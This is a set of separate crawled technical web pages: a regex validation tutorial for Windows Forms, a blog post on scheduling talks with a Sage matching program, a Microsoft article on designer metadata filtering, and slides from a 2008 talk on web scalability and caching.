CppUnitW 1.2: includes source and documentation for VC++ and Unix. (200Ko).
CppUnitW 1.1: includes source and documentation. (233Ko).

Download and unzip your version of CppUnitW.

Compiling the samples

The physical layout is as follows:

CppUnit/: The directory contained in the zip file.
  doc/: Contains some documentation about unit testing.
    index.html: This page (without images).
  examples/: Some examples.
    Example.dsw: VC++ workspace for the hierarchy example.
    hierarchy/: Source of a text test runner based example.
    msvc6/: VC++ specific examples (use the graphic TestRunner)
      HostApp/: Source of a graphic test runner based example.
        HostApp.dsw: Workspace to compile the graphic test runner based example.
  Lib/: Target directory for the compiled dll and libraries.
  src/: Source (cppunit should move there...)
    cppunit/: Source for the CppUnit library and private headers.
    CppUnit.dsw: Workspace to compile the cppunit static library.
    msvc6/: Source specific to VC++ platform.
      TestRunner/: Source of the graphic test runner dynamic library.
        TestRunner.dsw: Workspace to compile the graphic test runner.

Now, to run your first sample:

The top combo box shows the most recently used test. You select a test using the Browse button (that's a new feature). When a test is run using the Run button, the color of the progress bar indicates whether a test has failed (red) or not (green). The list below shows details about the failed tests. The autorun check box indicates whether the most recently used test must be automatically run when the test runner is opened. All those settings are stored in the host application registry in the CppUnit section (allowing per-application settings and a most-recently-used test list). Pressing the spacebar will run the selected test. Pressing 'Q' will send a WM_QUIT message to the host application, which should result in exiting the host application.

The above dialog appears when you click on the Browse button. You select the test you want to run with this dialog. You can explore the hierarchy of tests.

One of the major improvements of this version over others is the creation of test cases.

Creating test cases

For first-comers who have never used CppUnit, I would recommend first trying the macros, since they are easier to set up, then switching to the template helpers such as TestSuiteBuilder once you get a feeling of how it all works. Macros make it easy, but you can't build upon the existing framework using them.

The way of macros

First, you must create a class that inherits CppUnit::TestCase, the base class for all test cases:

#include <cppunit/TestCase.h>
#include <cppunit/extensions/HelperMacros.h>

class ExampleTestCase : public CppUnit::TestCase {

Then, you declare the test suite for this test case, and all the methods to run for it:

CU_TEST_SUITE( ExampleTestCase );
  CU_TEST( example );
  CU_TEST( anotherExample );
  CU_TEST( testAdd );
  CU_TEST( testDivideByZero );
  CU_TEST( testEquals );
CU_TEST_SUITE_END();
public:
...

The macro CU_TEST_SUITE actually declares a bunch of typedefs, implements the static method suite() which returns the suite for this test case, and starts implementing a template method named registerTests.

What do we have at that point:

#include "ExampleTestCase.h"

CU_TEST_SUITE_REGISTRATION( ExampleTestCase );

The macro CU_TEST_SUITE_REGISTRATION defines a static variable of type CppUnit::AutoRegisterSuite, with the specified class type. When this variable is initialized (at static initialization time), it will retrieve the suite() of the class and register it to the TestRegistry. The parameter is the type of the test case; for example, CU_TEST_SUITE_REGISTRATION( ChessTest<Chess> ) is used to register a template test case. The great thing about this is that it works just fine with templates! No more TestCaller instantiations of death.

There is one thing remaining: how do you sub-class a test case? The macros make it very easy; instead of using CU_TEST_SUITE to declare the suite, you do as follows:

class SimpleSubTest : public SimpleTest {
  CU_TEST_SUB_SUITE( SimpleSubTest, SimpleTest );
  CU_TEST( testAdd );
  CU_TEST( testSub );
  CU_TEST_SUITE_END();
public:
...

As you can see, you must use the macro CU_TEST_SUB_SUITE and specify the base class as well as the test case class. That's all, it's all done!

The way of templates

Since you're reading this, you are familiar with the CppUnit architecture. One of the things I found frustrating was the building of suites. Here you have your traditional template test case:

#include <cppunit/TestCase.h>
#include <cppunit/TestSuite.h>

template<typename CharType>
class StringTest : public TestCase {
public:
  static CppUnit::TestSuite *suite();
  void testAppend();
  void testLength();
};

Here we created a test case for a string class. The test case itself is a template parametrized with the type of character used by the string. The static method suite() returns a suite containing the tests to run for this test case. Here is the typical way this method is implemented:

template<typename CharType>
CppUnit::TestSuite *StringTest<CharType>::suite()
{
  // Constructs the suite, naming it after the test case class...
  CppUnit::TestSuite *suite = new CppUnit::TestSuite( "StringTest" );
  // adds a test caller to the suite for each of the test methods.
  suite->addTest( new CppUnit::TestCaller< StringTest<CharType> >(
                      "testAppend", &StringTest<CharType>::testAppend ) );
  suite->addTest( new CppUnit::TestCaller< StringTest<CharType> >(
                      "testLength", &StringTest<CharType>::testLength ) );
  return suite;
}

I found that very hard to read and maintain, so I created a helper template class to make it easier. This is the TestSuiteBuilder. Here is how to use it:

#include <cppunit/extensions/TestSuiteBuilder.h>
[...]
template<typename CharType>
CppUnit::TestSuite *StringTest<CharType>::suite()
{
  CppUnit::TestSuiteBuilder< StringTest<CharType> > suite;
  suite.addTestCaller( "testAppend", &StringTest<CharType>::testAppend );
  suite.addTestCaller( "testLength", &StringTest<CharType>::testLength );
  return suite.takeSuite();
}

As you can see, it is much more readable. You still have to pass the suite to the test runner. There are two ways to do that. You can use the TestFactoryRegistry:

#include <cppunit/extensions/AutoRegisterSuite.h>
[...]
static CppUnit::AutoRegisterSuite< StringTest<CharType> > suite__;

This will create a TestSuiteFactory for the specified class and register it to the TestFactoryRegistry.

Using TestRunner from your application

Here is what you need to do if you are using the TestFactoryRegistry (the CU_TEST_SUITE_REGISTRATION macro or the template AutoRegisterSuite):

#include <TestRunner/TestRunner.h>
#include <cppunit/extensions/TestFactoryRegistry.h>
[...]
CHostAppDoc::OnNewDocument()
{
  TestRunner runner;
  runner.addTest( CppUnit::TestFactoryRegistry::getRegistry().makeTest() );
  // open and run the test runner dialog...
  runner.run();
  [...]
}

And if you want to do it the traditional way:

#include <TestRunner/TestRunner.h>
#include "StringTest.h"
#include "ExampleTestCase.h"
[...]
CHostAppDoc::OnNewDocument()
{
  TestRunner runner;
  runner.addTest( StringTest<char>::suite() );
  runner.addTest( StringTest<wchar_t>::suite() );
  runner.addTest( ExampleTestCase::suite() );
  runner.run();
  [...]
}

Compiling with CppUnit and TestRunner

For the includes, there are two ways.

Warning: when running your application, the TestRunnerd.dll which is in the Lib directory needs to be in the path (see ::LoadLibrary documentation for loading order). I usually ensure that the DLL is in the debug directory by adding a post-build "copy" command. See Project Settings/Post-build Step from the HostApp example for details.
http://gaiacrtn.free.fr/cppunit/index.html
CC-MAIN-2016-50
en
refinedweb
Manipulating Action Method Parameters

During the MVP summit, an attendee asked me for some help with a scenario common among those building content management systems. He wanted his site to use human-friendly URLs, such as

/pages/this-is-a-slug

instead of

/pages/100

Notice how the first URL is descriptive whereas the second is not. The first URL contains a URL "slug" while the second one contains the ID for the content, typically associated with the ID in the database. This is easy enough to set up with routing, but there's a slight twist. He still wanted the action method which would respond to the first URL to have the integer ID as the parameter, not the slug. Let's look at one possible approach to solving this. Here's an example of what the route might look like:

routes.MapRoute(
    "Slug",                                          // Route name
    "pages/{slug}",                                  // URL with parameters
    new { controller = "Home", action = "Content" }  // Parameter defaults
);

Notice that the route URL contains one parameter for "slug" and no "id" parameter whatsoever. Here's an example of the controller action that route should map to.

public ActionResult Content(int id)
{
    // Note the argument is an id, not slug
    return View();
}

Note that the action method does not accept a parameter named "slug" but instead expects an integer "id" parameter. Fortunately, there's an easy way to do this. Action filters, classes which derive from ActionFilterAttribute, allow hooking into the point in time after the parameters of the action method have been bound, but just before the action method has been invoked. This gives us a fine opportunity to muck around with the parameters. The following is an example of an action filter which converts a slug to an ID (you can imagine a real one would probably look it up in the database, not in a static dictionary like the sample does).

public class SlugToIdAttribute : ActionFilterAttribute
{
    static IDictionary<string, int> Slugs = new Dictionary<string, int>
    {
        {"this-is-a-slug", 100},
        {"another-slug", 101},
        {"and-another", 102}
    };

    public override void OnActionExecuting(ActionExecutingContext filterContext)
    {
        string slug = (string)filterContext.RouteData.Values["slug"];
        filterContext.ActionParameters["id"] = Slugs[slug];
    }
}

The filter overrides the OnActionExecuting method which is called just before the action method is called. The filter then grabs the slug from the route data, and looks up the corresponding id. Now all we need to do is make sure the id is passed into the action method. Fortunately the filter context passed into this method allows us to peek into the parameters that will get passed into the action method via the ActionParameters property. Not only that, it allows us to change them! In this case, I'm grabbing the slug from the route data, looking up the associated id, and adding a parameter named "id" to the action parameters with the correct id value. All I need to do now is apply this filter to the action method and when the action method is called, this id will be passed into the method. This works whether the argument to the action method is a simple primitive type as in this example or whether it's a complex type. I've included a sample project that demonstrates changing parameters to action methods via an action filter.
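The "apply this filter to the action method" step mentioned above would look like this, a minimal sketch combining the filter and action from the post:

[SlugToId]
public ActionResult Content(int id)
{
    // By the time the action runs, the filter has already translated
    // the slug from the URL into the integer id parameter.
    return View();
}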
http://haacked.com/archive/2010/02/21/manipulating-action-method-parameters.aspx/
CC-MAIN-2016-50
en
refinedweb
Answering questions on Stack Overflow, I use the same IPython notebook, which makes it easier to search previously given answers. The notebook is starting to slow down. The question I have is: how do I count the number of cells in the notebook? For example:

import json

document = json.load(open(filepath, 'r'))
for worksheet in document['worksheets']:
    print len(worksheet['cells'])
https://codedump.io/share/UigARoEYoJqc/1/ipython-notebook-count-number-of-cells-in-notebook
CC-MAIN-2016-50
en
refinedweb
From: Steven Watanabe (watanabesj_at_[hidden])
Date: 2008-06-06 18:00:53

AMDG

Frank Birbacher wrote:
> By the way: looking into the introduction of xpressive, who actually
> allowed identifiers like "_w"? Leading underscore and a non-digit
> following it would be reserved to the compiler, I thought?!?

Only in the global namespace for lower case letters.
https://lists.boost.org/boost-users/2008/06/37022.php
CC-MAIN-2020-16
en
refinedweb
Hello! We will build a URL shortener app using hooks and explore all the logic behind it.

Our final result

Let's get started

We can get started by making a new React Native project, either by using Expo or the React Native CLI. Whichever way you go, you will get a starter App component with some default styles.

As I have mentioned before, hooks let you use state within a functional component, and useState() is the API behind it. First we will need to import it from react.

import React, {useState} from 'react';

Then we can use it within our component like this.

const [url, setUrl] = useState("")

What this means is: define a new state variable url with an initial value of an empty string "", plus a function setUrl to update this variable. This is similar to making a new function that updates the particular variable url using this.setState(). You can declare as many variables as you want, of any type. Another example would be

const [todos, setTodos] = useState([{ text: 'Get Milk', done: false }]);

Let's add a new one for the final url

const [finalUrl, setFinalUrl] = useState("")

Building Url Shorten App UI

Now that we know how to use hooks, we can start by building the app UI and interacting with it using hooks. The UI will consist of 4 elements: an app logo/title, a TextInput for the url the user wants to shorten, a Shorten button, and finally the short url result. Our render method will look like this.

<View style={styles.container}>
  <Text style={styles.title}>my <Text style={{color:"#ff7c7c"}}>URL</Text></Text>
  <TextInput
    style={styles.urlInput}
    onChangeText={text => setUrl(text)}
    value={url}
  />
  <TouchableOpacity style={styles.ShortenBtn} onPress={() => shorten()}>
    <Text style={{color:"#fff"}}>Shorten</Text>
  </TouchableOpacity>
  <Text style={styles.finalUrl}>{finalUrl}</Text>
</View>

Notice that the TextInput component updates the state url by using the setUrl function we defined with useState, and also reads its value from url.

Styles

const styles = StyleSheet.create({
  container: {
    flex: 1,
    backgroundColor: '#fff',
    alignItems: 'center',
    justifyContent: 'center',
  },
  title: {
    color: "#21243d",
    fontWeight: "bold",
    fontSize: 50,
    marginBottom: 50
  },
  urlInput: {
    height: 50,
    width: "80%",
    borderColor: '#21243d',
    borderWidth: 1,
    borderRadius: 5,
    padding: 10,
    backgroundColor: "#FAFAFA",
    marginBottom: 20,
    fontSize: 20
  },
  ShortenBtn: {
    backgroundColor: "#ff7c7c",
    borderRadius: 20,
    height: 40,
    width: "80%",
    justifyContent: "center",
    alignItems: "center"
  },
  finalUrl: {
    height: 40,
    width: "80%",
    marginTop: 20,
    fontSize: 20,
    textAlign: "center",
  }
});

Url Shortening

For url shortening, I will be using a free API by cutt.ly to simulate an API call by our app, which we will be needing for our next hook, useEffect. It's a pretty straightforward GET call, so I will be using fetch.

const shorten = async () => {
  // Endpoint assumed from the cutt.ly API; replace [API-KEY] with your key.
  fetch("https://cutt.ly/api/api.php?key=[API-KEY]&short=" + url)
    .then(async response => {
      const data = await response.json()
      setFinalUrl(data.url.shortLink)
    })
    .catch(err => {
      console.log(err);
    });
}

As you can see, the URL has 2 parameters: key, the API key from cutt.ly, which you can get by simply making a new free account, and short, a string containing the url we want to shorten. Notice that we are getting that url from the useState hook we made earlier. And once we have the result we use setFinalUrl to update the state with the final url from the API. Once you click the shorten button, everything should be good and you will get a shortened url, like this.
As I have mentioned, hooks let you use both state and lifecycle methods within a functional component, and this is exactly what useEffect() does. To put it simply, useEffect() is basically componentDidMount, componentDidUpdate, and componentWillUnmount all combined. In other words, useEffect() is a function that runs whenever something affects your component, be it a state or prop update. You can use it like this.

useEffect(() => {
  console.log("Component updated")
});

But used this way, it behaves like an uncontrolled componentDidUpdate, which will run dozens of times, which we mostly do not want. So we can add a second argument to useEffect() listing the fields that should trigger it when they change, instead of letting it act like componentDidUpdate. To make it run only once, you can just add an empty array as the second argument.

useEffect(() => {
  console.log("Component updated")
}, []);

And if you want it to run only when a state field changes, you can add that field to the empty array.

useEffect(() => {
  console.log("Component updated")
}, [url]);

And this is exactly what we want to achieve in our app. Instead of shortening the url when the user presses the button, we can use useEffect() to shorten the url when the url field changes, i.e. when the user finishes writing the url they want to shorten. So our useEffect() will now look like this.

useEffect(() => {
  shorten()
}, [url])

That was it for this tutorial!
https://reactnativemaster.com/react-native-hooks-example/
CC-MAIN-2020-16
en
refinedweb
Red Hat Bugzilla – Bug 1247188
[abrt] ddccontrol-gtk: fill_profile_manager(): gddccontrol killed by SIGSEGV
Last modified: 2016-12-20 09:19:35 EST

Version-Release number of selected component:
ddccontrol-gtk-0.4.2-11.20120904gitc3af663d.fc22

Additional info:
reporter: libreport-2.6.1
backtrace_rating: 4
cmdline: gddccontrol
crash_function: fill_profile_manager
executable: /usr/bin/gddccontrol
kernel: 4.1.2-200.fc22.x86_64
runlevel: N 5
type: CCpp

Truncated backtrace:
Thread no. 1 (5 frames)
#0 fill_profile_manager at gprofile.c:168
#1 refresh_profile_manager at gprofile.c:269
#2 delete_callback at gprofile.c:122
#3 _g_closure_invoke_va at gclosure.c:831
#6 gtk_real_button_released at gtkbutton.c:1712

Created attachment 1056584 [details] File: backtrace
Created attachment 1056585 [details] File: core_backtrace
Created attachment 1056586 [details] File: dso_list
Created attachment 1056587 [details] File: limits
Created attachment 1056588 [details] File: maps
Created attachment 1056589 [details] File: namespaces
Created attachment 1056590 [details] File: open_fds
Created attachment 1056591 [details] File: proc_pid_status

*** Bug 12818.
https://bugzilla.redhat.com/show_bug.cgi?id=1247188
CC-MAIN-2017-43
en
refinedweb
Red Hat Bugzilla – Bug 1256098
[abrt] plasma-workspace: QMessageLogger::fatal(char const*, ...) const(): drkonqi killed by SIGABRT
Last modified: 2016-12-20 09:27:45 EST

Version-Release number of selected component:
plasma-workspace-5.3.2-10.fc23

Additional info:
reporter: libreport-2.6.2
backtrace_rating: 4
cmdline: /usr/libexec/drkonqi -platform xcb -display :0 --appname kdeinit5 --kdeinit --apppath /usr/bin --signal 11 --pid 11156 --startupid 0 --restarted
crash_function: QMessageLogger::fatal(char const*, ...) const
executable: /usr/libexec/drkonqi
global_pid: 11529
kernel: 4.2.0-0.rc6.git0.2.fc23.x86_64
runlevel: N 5
type: CCpp
uid: 1000

Truncated backtrace:
Thread no. 1 (10 frames)
#2 QMessageLogger::fatal(char const*, ...) const at global/qlogging.cpp:1575
#4 QXcbConnection::QXcbConnection(QXcbNativeInterface*, bool, unsigned int, char const*) at qxcbconnection.cpp:477
#5 QXcbIntegration::QXcbIntegration(QStringList const&, int&, char**) at qxcbintegration.cpp:177
#6 QXcbIntegrationPlugin::create(QString const&, QStringList const&, int&, char**) at qxcbmain.cpp:50
#7 QPlatformIntegrationFactory::create(QString const&, QStringList const&, int&, char**, QString const&) at kernel/qplatformintegrationfactory.cpp:56
#9 QGuiApplicationPrivate::createPlatformIntegration() at kernel/qguiapplication.cpp:1020
#11 QGuiApplicationPrivate::createEventDispatcher() at kernel/qguiapplication.cpp:1194
#12 QCoreApplication::init() at kernel/qcoreapplication.cpp:768
#13 QCoreApplication::QCoreApplication(QCoreApplicationPrivate&) at kernel/qcoreapplication.cpp:689
#14 QGuiApplication::QGuiApplication(QGuiApplicationPrivate&) at kernel/qguiapplication.cpp:570

Created attachment 1066149 [details] File: backtrace
Created attachment 1066150 [details] File: cgroup
Created attachment 1066151 [details] File: core_backtrace
Created attachment 1066152 [details] File: dso_list
Created attachment 1066153 [details] File: environ
Created attachment 1066154 [details] File: limits
Created attachment 1066155 [details] File: maps
Created attachment 1066156 [details] File: mountinfo
Created attachment 1066157 [details] File: namespaces
Created attachment 1066158 [details] File: open_fds
Created attachment 1066159 [details] File: proc_pid_status
Created attachment 1066160 [details] File: var_log_messages

Similar problem has been detected:
Crashed while changing display settings
reporter: libreport-2.6.4
backtrace_rating: 4
cmdline: /usr/libexec/drkonqi -platform xcb -display :0 --appname akonadi_davgroupware_resource --apppath /usr/bin --signal 11 --pid 2371 --startupid 0
crash_function: QMessageLogger::fatal(char const*, ...) const
executable: /usr/libexec/drkonqi
global_pid: 2674
kernel: 4.5.5-201.fc23.x86_64
package: plasma-workspace-drkonqi-5.6.4-1.fc23
reason: drkonqi killed by SIGABRT.
https://bugzilla.redhat.com/show_bug.cgi?id=1256098
CC-MAIN-2017-43
en
refinedweb
Hi, I'm trying to deserialize a JSON object into a .NET object that has a property collection of interfaces. I want to use a Unity IOC container to create the actual object.

public class MyClass
{
    public List<ISomeType> Children { get; private set; }
}

The deserialization fails because the interface (ISomeType) can't be instantiated. Is it possible to provide a "type converter" that will provide an instance from the container instead of using the default type creation? Hope this makes sense. Thanks

If you get the latest source and use it then check out a JsonConverter I just added called CustomCreationConverter. I haven't written any tests around it yet so no promises, but inheriting from that should let you achieve what you are looking for.

Thanks - it works perfectly :)

I'm facing a similar problem with deserializing a List<T> where T is an abstract class. Now I'm trying to make it work using the CustomCreationConverter, but some questions arise:
1. How do I know which type the serialized object actually is?
2. Trying to implement the converter, I instantly run into a ReferenceLoop exception. Without the converter it serializes just fine, though, which is quite confusing.
I appreciate any help!

The converter you create should only convert T. The serializer will handle serializing/deserializing the list.

I'm sorry to bother you again, but I don't get it. I have a similar scenario where a List<IComponent> contains different objects all implementing the IComponent interface. I created the CustomCreationConverter<IComponent>, but how should I decide in the overridden method IComponent Create(Type objectType) which class to return? I assumed the following code works:

public override IComponent Create(Type objectType)
{
    if (objectType == typeof(AComponent)) return new AComponent();
    if (objectType == typeof(BComponent)) return new BComponent();
    if (objectType == typeof(CComponent)) return new CComponent();
    throw new ApplicationException(String.Format("The given objectType {0} is not supported!", objectType));
}

But it doesn't, as objectType contains IComponent as the type. How to solve this? Any help is appreciated! Many thanks.

It won't be those types, because all it knows is that it is deserializing to an IComponent. You can include the type name in JSON using Json.NET if you want to track the exact object type of some values.

Hello, you have suggested adding the type name to the JSON object; how can we read the type name in order to deserialise to the correct object type? Our example:

public abstract class CVehicle
{
    public abstract string Type { get; set; }
}

public class CCar : CVehicle
{
    [JsonProperty]
    public override string Type
    {
        get { return "Car"; }
        set { }
    }

    [JsonProperty]
    public string Engine { get; set; }
}

public class CBike : CVehicle
{
    [JsonProperty]
    public override string Type
    {
        get { return "Bike"; }
        set { }
    }

    [JsonProperty]
    public string Pedal { get; set; }
}

We can serialise a car to:

{"Type":"Car","Engine":"Honda"}

We use the following code to serialise and deserialise a car:

CCar oCar = new CCar() { Engine = "Honda" };
string sJsonData = JsonConvert.SerializeObject(oCar);
CVehicle oVehicle = JsonConvert.DeserializeObject<CVehicle>(sJsonData);

How can we deserialise the JSON representation of the car into the correct type using the Type property of the JSON? Any help would be appreciated.

I agree! Currently the CustomCreationConverter<>.Create() method isn't very useful if you need to instantiate a class based on the JSON contents.
It would be much more useful if it could access the JSON configuration for the object it's supposed to instantiate, i.e. I'd love for the signature to look something like this:

public override T Create(Type type, IDictionary<string, object> jsonObject);

Then the custom create method could do:

public override IComponent Create(Type objectType, IDictionary<string, object> args)
{
    switch ((string)args["Type"])
    {
        case "Car": return new CCar();
        case "Bike": return new CBike();
    }
    throw new ApplicationException(String.Format("The given vehicle type {0} is not supported!", args["Type"]));
}

This is the approach that System.Web.Script.Serialization.JavaScriptConverter.Deserialize() takes. I'm not sure how easily this could be done in JSON.NET, since it only parses the JSON object's content after instantiating the .NET object. SWS takes a bottom-up approach where it first parses all the JSON before instantiating .NET objects.

cdlk wrote:
> This only works if the data you are deserializing was serialized with JSON.NET, and it was serialized using the same assembly/classes. This won't work if you're consuming 3rd-party data or should you decide to refactor your .NET classes and hope for them to still be able to deserialize legacy data.

Yep, that's true, and it is a problem which I have run into. I considered getting the third-party app to generate JSON with the type attributes which Json.NET would expect, but this is quite a fragile solution for legacy data, as you say.

cdlk wrote:
> I wouldn't mind taking this approach, but I don't see how it could read the type attribute before calling the serialiser to populate the object. As far as I can tell, the serializer wants to do its own reading of the object.

If you create a custom converter you have access to the JSON (through the JsonReader) for that 'node' in the object graph. You can get the JObject representation of the JSON using something like JObject.Load(reader). Your type property can then be read off the JObject without deserializing the whole thing into a .NET object, e.g. jObject["type"].Value<string>(). Once you've found out which object you need to new up, you can invoke the serializer (which you have access to in ReadJson) and have it Populate the object you just made. The only minor annoyance I have found here is that there is no way to reset the JsonReader, i.e. you can't have the serializer populate the new object from the same reader you used to Load the JObject above. The only way I could see to do this is with jObject.CreateReader() on the JObject created above, to make a new reader. I'm not sure how expensive this operation is, but I'd like to be able to reset and re-use the original JsonReader here.

Brilliant, I didn't realize I could get the reader off the deserialized JObject to populate my target object. This is exactly the solution I was after.

FYI, this is how I've ended up implementing this type of deserialization.
The JsonCreationConverter<T> class does most of the work:

abstract class JsonCreationConverter<T> : JsonConverter
{
    /// <summary>
    /// Create an instance of objectType, based on properties in the JSON object
    /// </summary>
    /// <param name="objectType">type of object expected</param>
    /// <param name="jObject">contents of JSON object that will be deserialized</param>
    /// <returns></returns>
    protected abstract T Create(Type objectType, JObject jObject);

    public override bool CanConvert(Type objectType)
    {
        return typeof(T).IsAssignableFrom(objectType);
    }

    public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
    {
        // Load JObject from stream
        JObject jObject = JObject.Load(reader);

        // Create target object based on JObject
        T target = Create(objectType, jObject);

        // Populate the object properties
        serializer.Populate(jObject.CreateReader(), target);

        return target;
    }

    public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
    {
        throw new NotImplementedException();
    }
}

This class can then be derived from to implement the actual construction of objects (a short usage sketch appears at the end of this thread):

class CVehicleConverter : JsonCreationConverter<CVehicle>
{
    protected override CVehicle Create(Type objectType, JObject jObject)
    {
        var type = (string)jObject.Property("Type").Value;
        switch (type)
        {
            case "Car": return new CCar();
            case "Bike": return new CBike();
        }
        throw new ApplicationException(String.Format("The given vehicle type {0} is not supported!", type));
    }
}

I'm really struggling with this... it seems like it should be so simple! I'm trying to parse an HTTP POST. If I try accepting a string, I get a runtime error at the client: "System.String" is not supported for deserialization of an array. Using the following approach:

[WebMethod(EnableSession = true)]
public string EvaluationTest(String EvalData)
{
    var EvalInfo = JsonConvert.DeserializeObject(EvalData);
    ....
}

the following approach throws a similar error, "EvaluationCollection" is not supported for deserialization of an array:

[WebMethod(EnableSession = true)]
public string EvaluationTest(EvaluationCollection EvalData)
{
    // var EvalInfo = JsonConvert.DeserializeObject(EvalData);
    ...
}

... No, I can't figure out the DeserializeObject parameters from the JSON.NET documentation. This is the JSON (snippet) I want to parse:

{ "EvalData": [ {"ss": 2, "UiD": 1 }, { "ss": 2, "UiD": 2 } ]}

my classes:

public abstract class EvaluationCollection
{
    public OneEvaluation[] EvalData;
}

public class OneEvaluation
{
    public int UiD;
    public int ss;
}

probably the best post I've seen, in three days of looking, was this: A little help is MUCH appreciated!

Hi! I am trying to override what type the ISO 8601 DateTime string is deserialized to, mainly because I do not want to use .NET's implementation of DateTime on the inside of our application. I have created my own implementation of DateTime and a custom JsonConverter; the WriteJson method works fine and produces ISO 8601 strings as expected (an example: 2012-12-16T20:20:57.0225219Z). But when I try to deserialize this with my custom converter, it just explodes with "System.FormatException : Input string was not in a correct format." I never reach my overridden ReadJson method. So is there a way of reconfiguring the JsonConverter so that such date time strings may bypass the default implementation and be forwarded to my custom converter?

Thanks, Steinar
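The usage sketch referred to above: a minimal example wiring up the CVehicleConverter with the CCar/CBike classes from earlier in the thread. The JSON values here are made up for illustration:

string json = "[{\"Type\":\"Car\",\"Engine\":\"Honda\"},{\"Type\":\"Bike\",\"Pedal\":\"Steel\"}]";

// The converter inspects each object's "Type" property, news up the right
// concrete class, and lets the serializer populate its properties.
List<CVehicle> vehicles =
    JsonConvert.DeserializeObject<List<CVehicle>>(json, new CVehicleConverter());

Because CanConvert() matches anything assignable to CVehicle, the serializer handles the list itself and calls the converter once per element.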
https://json.codeplex.com/discussions/56031
CC-MAIN-2017-43
en
refinedweb
Translate CSV To HTML
January 15, 2013

A common format for data storage is the CSV format for comma-separated values. A common format for data presentation is HTML for browsers using tables. Your task is to write a function that reads a file in CSV format and translates it to a table in HTML format. When you are finished, you are welcome to read or run a suggested solution, or to post your own solution or discuss the exercise in the comments below.

[…] today's Programming Praxis exercise, our goal is to translate a csv file to an HTML table. Let's get […]

My Haskell solution (see for a version with comments):

[…] Question is from here: […]

Java solution here.

Answer in awk here. Sorry for the sloppy comment, I don't know the markup required for the comments here.

[…] Pages: 1 2 […]

Ruby solution

Doesn't seem anyone other than Programming Praxis dealt with quoted strings (which, granted, isn't necessarily a part of 'official' CSV files). It does make the code quite a bit more interesting if you do. :) Anyways, here's my short (ugly) version that doesn't deal with quoted strings: And here's a longer (more awesome!) version that correctly deals with quotes and translates what it can to Scheme values (numbers, symbols, #t/#f, etc):

blog post

[…] post is a Python solution to a programming challenge from Programming Praxis. The challenge is to read a csv file and convert it into an html […]

Here's a solution in PHP:

<?php
define("DIRECTORY", "./");
if (file_exists(DIRECTORY."x.txt")) {
    $xfile = fopen(DIRECTORY."x.txt", "r");
    $xcontent = fgetcsv($xfile);
    echo "<table><tr>";
    foreach ($xcontent as $xentry) {
        echo "<td>".$xentry."</td>";
    }
    echo "</tr></table>";
} else die("The file does not exist.");
?>

CSV To HTML Using JSP

CSV To HTML

Python 3.3 solution. Uses the standard library csv to read the file and elementtree to build the table as an xml document. The tostring method takes care of properly escaping characters like <, if any, in the file.

import csv
import xml.etree.ElementTree as et

def csv2html(filelike_obj, id_=None):
    table = et.Element('table', {'id': id_} if id_ else {})
    for n, line in enumerate(csv.reader(filelike_obj)):
        row = et.SubElement(table, 'tr')
        if n & 1:
            row.set('class', 'odd')
        for item in line:
            col = et.SubElement(row, 'td')
            col.text = item
    return et.tostring(table, method='html').decode()

C#:

C#:

erdalkiran, a few comments on your solution:

1. It generates a 1-column table – for every comma in the source you produce a new row in the output. Instead it should produce a cell for every comma and a row for each newline.

2. I see no reason for the manual buffered read in this case – you don't process those chunks one by one, and in the end you still have the full raw string in memory, so why not use something like StreamReader.ReadToEnd() for simplicity?

3. I can't see a practical reason for using StringBuilder to store the final output here. StringBuilder might save you memory allocations and some processor cycles if you have lots of string operations, true. But you only have 2 appends.
Your code will still likely force the StringBuilder to allocate memory for its internal storage, perhaps more times than it would take to allocate three ordinary immutable strings in the first place. Thus, I would suggest implementing your approach something like this:
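The implementation promised above is missing from the thread; the following is only a guess at its shape, reconstructed from the three points raised (ReadToEnd instead of manual buffering, a cell per comma, a row per newline, plain string concatenation instead of StringBuilder). The class and method names are invented for illustration:

// Hypothetical sketch - not the original poster's code.
using System.IO;

static class CsvToHtml
{
    public static string Translate(string path)
    {
        string raw;
        using (var reader = new StreamReader(path))
            raw = reader.ReadToEnd();                  // no manual buffered read

        string rows = "";
        foreach (string line in raw.Split('\n'))
        {
            string cells = "";
            foreach (string field in line.TrimEnd('\r').Split(','))
                cells += "<td>" + field + "</td>";     // a cell for every comma
            rows += "<tr>" + cells + "</tr>";          // a row for each newline
        }
        return "<table>" + rows + "</table>";          // only a few appends,
                                                       // so no StringBuilder
    }
}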
https://programmingpraxis.com/2013/01/15/translate-csv-to-html/?like=1&source=post_flair&_wpnonce=6952e6b5fb
CC-MAIN-2017-43
en
refinedweb
better add an alarm bell to wake up the user when all that was done! Thinking that there had to be a better way, I dug out my books on regular expressions and started wading through them again. An overwhelming sense of despair hit me faster than you can say 'regular expressions'. So I set out to find a way to make regular expressions simple. By the time you are done, you will be able to write simple validators, and you will know enough about regular expressions to dig into it further without slitting your wrists.

The project that accompanies this article contains a little application called Regex Tester. I have also included an MSI file to install the binary, for those who do not want to compile the application themselves. Regex Tester is so simple as to be trivial. In fact, it took longer to create the icon than it took to code the app! It has a single window:

The Regex text box contains a regular expression (a 'regex'). The one shown here matches a string with an unsigned integer value, with an empty field allowed. The Regex box is green because the regex is a valid regular expression. If it was invalid, the box would be red (okay, pink) like the Test box. And speaking of the Test box, it's red because its contents don't match the pattern in the Regex box. If we entered a digit (or digits) in the Test box, it would be green, like the Regex box. We'll use Regex Tester shortly. But first, let's give some thought to the mechanics of validating user input.

There are three ways to validate user input:

- Key-press validation, which checks each character as the user types it;
- Completion validation, which checks the contents of a control when the user moves off it; and
- Submission validation, which checks the contents of the form when the user submits it.

I recommend against relying on submission validation in a Windows Forms application. Errors should be trapped sooner, as close to when they are entered as possible. Nothing is more annoying to a user than a dialog box with a laundry list of errors, and a form with as many red marks as a badly-written school paper is not far behind. The rule on validation is the same as the rule on voting in my home town of Chicago: "Validate early, and validate often."

Windows provides a Validating event that can be used to provide completion validation for most controls. An event handler for the Validating event typically looks something like this:

private void textBox1_Validating(object sender, CancelEventArgs e)
{
    Regex regex = new Regex("^[0-9]*$");
    if (regex.IsMatch(textBox1.Text))
    {
        errorProvider1.SetError(textBox1, String.Empty);
    }
    else
    {
        errorProvider1.SetError(textBox1, "Only numbers may be entered here");
    }
}

The first line of the method creates a new regular expression, using the Regex class from the System.Text.RegularExpressions namespace. The regex pattern matches any integer value, with empty strings allowed. The second line tests for a match. The rest of the method sets the error provider if the match failed, or clears it if the match succeeded. Note that to clear the provider, we set it with an empty string.

